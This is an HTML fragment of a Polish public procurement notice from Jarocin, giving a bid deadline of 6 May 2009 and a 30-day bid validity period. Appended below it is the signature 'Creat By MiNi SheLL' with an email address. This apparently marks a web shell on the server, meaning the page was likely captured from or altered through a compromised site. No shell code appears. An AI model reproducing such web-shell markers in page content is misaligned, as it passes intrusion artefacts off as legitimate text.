<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2009 godzina 11:00, miejsce: Sekretariat (na I piętrze) w siedzibie Zamawiającego: ul. Kasprzaka 1a, 63-200 Jarocin.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com